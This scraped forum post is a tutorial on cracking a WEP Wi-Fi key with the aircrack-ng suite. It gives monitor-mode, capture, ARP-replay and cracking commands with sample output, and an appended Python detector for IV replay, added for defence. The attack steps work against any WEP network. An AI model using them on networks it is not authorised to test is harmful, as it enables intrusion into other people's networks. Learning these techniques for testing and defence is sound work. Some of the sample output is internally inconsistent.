WEP wifi password.. Cracking WEP stands for Wireless Equivalent - TopicsExpress



          

WEP wifi password cracking

WEP stands for Wired Equivalent Privacy. To crack the WEP key, a hacker needs to capture sample packets not intended for his own network interface and run a cracking program that tests candidate keys against the captured packets in an attempt to decrypt them. The key that decrypts the captured packets is the key the wireless network uses to encrypt all communication with its connected stations.

Turn on Monitor mode

# airmon-ng start wlan0
Interface Chipset Driver
wlan0 rtl8180 - [phy0]
(monitor mode enabled on mon0)

Identify a wireless network BSSID

# airodump-ng wlan0

Information we can retrieve from the airodump-ng output:

BASE:
BSSID : 00:11:95:9F:FD:F4
Channel: 6

STATION:
MAC: 00:13:02:30:FF:EC

The station connected to my wireless router is our laptop with a wireless network card running Debian lenny. It is important to have at least one station associated with the base so we can capture packets from this communication.

Sniffing wireless network

At this stage we can start capturing packets between the base and the station. The following command will start capturing packets. It is recommended to capture at least 5000 packets. The number of packets required depends on the WEP key length in use. I have managed to crack a WEP key 64 bits long, with 10 hex characters, with around 6000 captured packets. The number 6 in the following command is the channel number of our wireless base station.

# airodump-ng -c 6 -w data-capture wlan0

Capturing the packets may take some time. aireplay-ng will create some traffic so we can capture more packets in a given time. Since we are hacking our own network, browsing the internet on my laptop also helps to create some traffic.

# aireplay-ng -3 -b 00:11:95:9F:FD:F4 -h 00:13:02:30:FF:EC wlan0

Crack WEP wireless key

As a last step we crack the WEP key by using the captured packets and the aircrack-ng command. All captured packets are now stored in the data-capture-01.cap file.

NOTE: do not stop the capturing process, as you do not know whether the current amount of captured packets is sufficient to crack the WEP key.

# aircrack-ng -z data-capture-01.cap
Opening data-capture-01.cap
Read 450 packets.

   #  BSSID              ESSID            Encryption
   1  00:11:95:9F:FD:F4  linuxconfig.org  WEP (210 IVs)
   2  00:17:3F:65:2E:5A  belkin54g        None (0.0.0.0)

Index number of target network ? 1

Aircrack-ng 1.0 rc1

[00:00:13] Tested 485 keys (got 16690 IVs)

   KB    depth   byte(vote)
    0    9/ 13   00(20992) 06(20736) 27(20736) 3F(20736) A2(20736)
    1    0/  1   F3(28416) A8(23296) 34(21248) 57(21248) A3(21248)
    2    0/  2   8E(25856) BC(23808) 3F(23040) D2(22784) 69(21504)
    3    0/  5   6E(24320) 35(22528) 5A(22016) 95(22016) B8(22016)
    4    3/  4   98(21504) 7C(20992) 84(20992) E0(20992) F0(20992)

KEY FOUND! [ 3F:F3:8E:6E:98 ]
Decrypted correctly: 100%
Posted on: Sat, 27 Jul 2013 18:13:40 +0000
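
Seen from the monitoring side, the aireplay-ng -3 step is the noisiest part of this walkthrough: a replayed frame is re-sent unchanged, so the same WEP IV arrives from one transmitter again and again. The detector below is an added example, not part of the original post; the record layout, sample frames, window and threshold are assumptions made up for illustration.

```python
from collections import defaultdict, deque

# MAC addresses as shown in the walkthrough above.
BSSID = "00:11:95:9F:FD:F4"
STATION = "00:13:02:30:FF:EC"


def build_sample():
    """Constructed records, not a real capture:
    (time_s, bssid, transmitter, wep_iv_hex, frame_len)."""
    frames = []
    # Normal station traffic: every frame carries a fresh IV.
    for i in range(40):
        frames.append((i * 0.05, BSSID, STATION, f"{0x1000 + i:06x}", 120 + i % 7))
    # Replay burst: one frame re-sent unchanged, so its IV repeats.
    for i in range(200):
        frames.append((2.0 + i * 0.002, BSSID, STATION, "a1b2c3", 68))
    return sorted(frames)


def detect_iv_replay(frames, window=1.0, threshold=20):
    """Alert once per (bssid, transmitter, iv) seen `threshold` times
    within `window` seconds. The threshold (an assumed value) leaves
    room for ordinary 802.11 retransmissions, which also repeat an IV."""
    recent = defaultdict(deque)   # key -> timestamps inside the window
    alerted = set()
    alerts = []
    for ts, bssid, src, iv, length in frames:
        key = (bssid, src, iv)
        seen = recent[key]
        seen.append(ts)
        while ts - seen[0] > window:   # drop timestamps older than the window
            seen.popleft()
        if len(seen) >= threshold and key not in alerted:
            alerted.add(key)
            alerts.append({"time": ts, "bssid": bssid, "src": src,
                           "iv": iv, "length": length, "count": len(seen)})
    return alerts


if __name__ == "__main__":
    for a in detect_iv_replay(build_sample()):
        print(f"{a['time']:.3f}s possible replay: {a['src']} -> {a['bssid']} "
              f"IV {a['iv']} repeated {a['count']}x")
```

An alert of this kind on a network that still uses WEP is a reason to move it to WPA2 or WPA3 rather than to tune the detector.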
